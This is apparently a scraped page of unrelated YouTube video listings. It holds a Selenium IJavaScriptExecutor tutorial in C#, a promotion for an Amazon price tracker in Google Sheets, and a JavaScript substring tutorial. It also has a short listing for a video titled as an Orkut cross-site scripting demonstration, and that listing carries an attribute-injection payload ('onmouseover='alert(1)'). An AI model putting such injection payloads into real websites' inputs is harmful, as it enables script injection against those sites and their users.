Javascript executor IJavascript Interface Alert using JavascriptExecutor Refresh the page using JavascriptExecutor Handle checkbox using JavascriptExecutor InnerText using JavascriptExecutor Get the Title of a page using JavascriptExecutor Get a domain of a page using JavascriptExecutor Get a URL of a page using JavascriptExecutor How to scroll a page using JavascriptExecutor How to navigate to other page using JavascriptExecutor Type text of JavascriptExecutor How to get height and width of a page using JavascriptExecutor What is JavaScript? JavaScript is the preferred language inside the browser to interact with HTML dom. This means that a Browser has JavaScript implementation in it and understands the JavaScript commands. What is IJavaScriptExecutor?   IJavaScriptExecutor is an Interface that helps to execute JavaScript through Selenium Webdriver. IJavaScriptExecutor provides two methods "executescript" & "executeAsyncScript“ to run JavaScript on the selected window or current page. Alert Pop Window We can create the alert pop-up using allowing code (IJavaScriptExecutor)driver).ExecuteScript(“alert('Hello')"); To Refresh The Page We can refresh the page by using following code ((IJavaScriptExecutor)driver).ExecuteScript("history.go(0)"); To Handle Checkbox To make the checkbox has checked ((IJavaScriptExecutor)driver).ExecuteScript("document.querySelectorAll('input[value = read]')[0].click()"); To make the checkbox has unchecked ((IJavaScriptExecutor)driver).ExecuteScript("document.querySelectorAll('input[value = read]')[0].click()"); To Get The Inner Text We can the inner text of page by using following code ((IJavaScriptExecutor)driver).ExecuteScript("return document.documentElement.innerText;").ToString(); To Get The Title Of Page We can get title of page by using following code ((IJavaScriptExecutor)driver).ExecuteScript("return document.title;").ToString(); To Get The Domain Of Page We can get Domain of page by using following code ((IJavaScriptExecutor)driver).ExecuteScript("return document.domain;").ToString(); To Get The URL Of Page We can get URL of page by using following code ((IJavaScriptExecutor)driver).ExecuteScript("return document.URL;").ToString(); To Scroll The Page To scroll the page vertically for 500px we use the following code ((IJavaScriptExecutor)driver).ExecuteScript("window.scrollBy(0,500)"); To scroll the page vertically till the end we use following code IJavaScriptExecutor)driver).ExecuteScript("window.scrollBy(0,document.body.scrollHeight)"); To navigate other page We can navigate to other page by using following code (IJavaScriptExecutor)driver).ExecuteScript("window.location='http://uitestpractice.com'"); To Get The Height And Width of page We can height and width of a page by using following code ((IJavaScriptExecutor)driver).ExecuteScript("return window.innerHeight;") ((IJavaScriptExecutor)driver).ExecuteScript("return window.innerWidth;") To Type The Text We can type the text into a text box by using following code ((IJavaScriptExecutor)driver).ExecuteScript("document.getElementById('Email').value='[email protected]';"); Possible Interview Questions on IJavaScriptExecutor What is Javascript What is IJavascriptExecutor How to create alert using IJavaScriptExecutor How to refresh the page using IJavaScriptExecutor How to handle the checkbox using IJavaScriptExecutor How to get the InnerText of javascript Executor How to get the title of a page using IJavaScriptExecutor How to get a domain of a page using IJavaScriptExecutor How to get a URL of a page using IJavaScriptExecutor How to scroll a page using IJavascriptExecutor How to navigate to other page using IJavascriptExecutor How to get the height and width of a page using IJavascript Executor How to type text into text box using IJavaScriptExecutor Code : [TestMethod] public void JavaScriptDemo() { IWebDriver driver = new FirefoxDriver(); driver.Url = "http://ankpro.com"; //((IJavaScriptExecutor)driver).ExecuteScript("prompt('Hello')"); //((IJavaScriptExecutor)driver).ExecuteScript("arguments[0].click();", "element"); //((IJavaScriptExecutor)driver).ExecuteScript("history.go(0)"); driver.Url = "http://uitestpractice.com/Students/Form"; //((IJavaScriptExecutor)driver).ExecuteScript("document.getElementByValue('dance').checked=true;"); ((IJavaScriptExecutor)driver).ExecuteScript("document.querySelectorAll('input[value = read]')[0].click()"); //String sText = ((IJavaScriptExecutor)driver).ExecuteScript("return document.documentElement.innerText;").ToString(); //Console.WriteLine(sText); //String sText1 = ((IJavaScriptExecutor)driver).ExecuteScript("return document.title;").ToString(); //Console.WriteLine(sText1); //String Text = ((IJavaScriptExecutor)driver).ExecuteScript("return document.domain;").ToString(); //Console.WriteLine(Text); Thread.Sleep(2000); driver.Quit(); }
Amazon price alert Tracker in Google Sheets

Channel Title : Amarindaz

Views : 432

Likes : 4

DisLikes : 1

Published Date : 2018-11-22T17:27:07.000Z

Free Version: https://gum.co/QcHLA Premium Version: https://gum.co/dAQdA Blog Post: http://www.amarindaz.com/amazon-price-alert-tracker-google-sheets/ Free Version: https://gum.co/QcHLA Premium Version: https://gum.co/dAQdA Description: The prices of products listed on the Amazon shopping website vary every day and a simple Google Spreadsheet can help you keep the monitor and track these price fluctuations via email. Just add the items that you wish to buy from Amazon in a spreadsheet and it will send you an email alert when the product’s price drops on Amazon. You’ll thus never miss the deal again. ***How To Get Amazon Price Alert In Google Sheets? When you click on the link (either Freemium or Premium), you have popped up asking email ID to send the detailed document and Payment (only for premium) to complete the purchase. Once you are done, you can check your email for attachment with details to copy Amazon price tracker on your drive. Make sure that you have already logged in with your Gmail account so that you can make a copy of this Sheet to Google drive. Isn’t simple? Now go to Google drive and open the spreadsheet. ***How To Set Up Amazon Price Alert Tracker? There are a few things you need to do on the Spreadsheet before you put Amazon price alert to work. It’s very simple and just one-time setup. Here are the steps Go to the “Settings” tab. That’ll be the first sheet on the tracker. Enter your Name on B1 and enter email ID that you want to get price alert. Amazon price alert settings Now go to the ASIN tab. Enter the ASIN of the product that you want to monitor. ***What is ASIN? ASIN stands for Amazon Standard Identification Number. It’s a 10-character alphanumeric unique identifier that’s assigned by Amazon.com and its partners. It’s used for product-identification within Amazon.com organization. ***Where can I find the ASIN for my Products? It’s simple. Just go to this product and scroll down the Product information page. Otherwise, you can use the search option (Ctr l+ F) and type “ASIN” on your browser. You can find ASIN as shown below. Just copy and put it on Column A of ASIN tab. Amazon price alert finding ASIN Go to carts or wish list that contains the products you want to buy in future. You can copy those product ASINs and put it in the first column of ASIN tab. Finally, your sheet will look like below Amazon price tracker list You can find “Amazon price alert tracker” menu button. Click that and it’ll display drop down as shown below. Click the “First Run” option to initialize the script. Alternatively, you can also click on the button “Click here for the first-time run” in the ASIN tab. Amazon price tracker first Run Now, you need to give authorization by clicking continue button Price tracker authorize Select the Gmail account for authorization Select the Gmail account Sometimes, you’ll get pop up like this for verification as we are connecting to Amazon API (Google consider this as the third-party app). Click the advanced link and select “Go to APT” link. Verify the app Now you want to give access to the Script to connect with Amazon API, your Gmail for sending email on behalf of you to the Email ID entered in the settings tab and automatically run scripts every day on the server side. Click “Allow” to proceed further. Allow access to Amazon tracker That’s it, you are done! Your script will run for the first time and show you the results on the ASIN and for confirmation, you’ll get an email as well. From now onwards, everything is automated! It’ll track the price every day and send you an update. You can add/remove products when needed. ********** Tutorial Playlists ********** Google apps script tutorial for beginners- https://goo.gl/wqHwqx Automate internet explorer with VBA- https://goo.gl/Xmy8Af Autoit tutorials for beginners- https://goo.gl/JHB1E2 Selenium Webdriver tutorials for beginners -https://goo.gl/QqxTrF ****** Contact me ******** Blog: http://www.amarindaz.com/contact/ FB page: http://www.facebook.com/amarindaz ******* Books written by me ******** Autoit tutorials for beginners: http://amzn.to/2GjaDbD Excel VBA for beginners: http://amzn.to/2nhI067 ******* Productivity tool ********* My Favorite YouTube Tools ➜ https://goo.gl/MX9Z4p and ➜https://goo.gl/UW1uRX ******* Gear Used To Shoot This Video ****** _Audio & Microphone http://amzn.to/2GibdGu ********Learning partner******** Video courses ➜https://click.linksynergy.com/fs-bin/click?id=832arX/53N8&offerid=323058.81&type=3&subid=0 Don't forget to subscribe! https://goo.gl/J2453w
Orkut - xss'onmouseover='alert(1)'// @ dekeeu %3C\x22

Channel Title : dekeeu

Views : 525

Likes : 3

DisLikes : 0

Published Date : 2014-10-02T16:45:43.000Z

Orkut - Orkut - xss"onmouseover="alert(1)"// @ dekeeu @ dekeeu
JavaScript substring example

Channel Title : kudvenkat

Views : 68423

Likes : 193

DisLikes : 4

Published Date : 2014-11-08T09:36:30.000Z

Link for all dot net and sql server video tutorial playlists http://www.youtube.com/user/kudvenkat/playlists Link for slides, code samples and text version of the video http://csharp-video-tutorials.blogspot.com/2014/11/javascript-substring-example.html In this video we will discuss a simple real time example of where we can use indexOf(), lastIndexOf() and substring() methods In the head section of the webform, include the following script section function getEmailandDomainParts() { var emailAddress = document.getElementById("txtEmailAddress").value; var emailPart = emailAddress.substring(0, emailAddress.indexOf("@")); var domainPart = emailAddress.substring(emailAddress.indexOf("@") + 1); document.getElementById("txtEmailPart").value = emailPart; document.getElementById("txtDomainPart").value = domainPart; } Finally set the onclick attriibute of the button to call the JavaScript function [input type="button" value="Get email & domain parts" style="width:250px" onclick="getEmailandDomainParts()"/] In Part 11 of JavaScript Tutorial we discussed indexOf() function. lastIndexOf() is also very useful function for manipulating strings. lastIndexOf() method returns the position of the last occurrence of a specified value in a string. Since it's job is to return the last index of the specified value, this method searches the given string from the end to the beginning and returns the index of the first match it finds. This method returns -1 if the specified value is not present in the given string. Example : Retrieve the last index position of dot (.) in the given string var url = "http://www.csharp-video-tutorials.blogspot.com"; alert(url.lastIndexOf(".")); Output : 42 Simple real time example where lastIndexOf and substring methods can be used In the head section of the webform, include the following script section function getDomainName() { var url = document.getElementById("txtURL").value; var domainName = url.substr(url.lastIndexOf(".")); document.getElementById("txtDomian").value = domainName; } Finally set the onclick attriibute of the button to call the JavaScript function [input type="button" value="Get top level domain" style="width: 300px" onclick="getDomainName()" /]

Facebook Page Like Box ::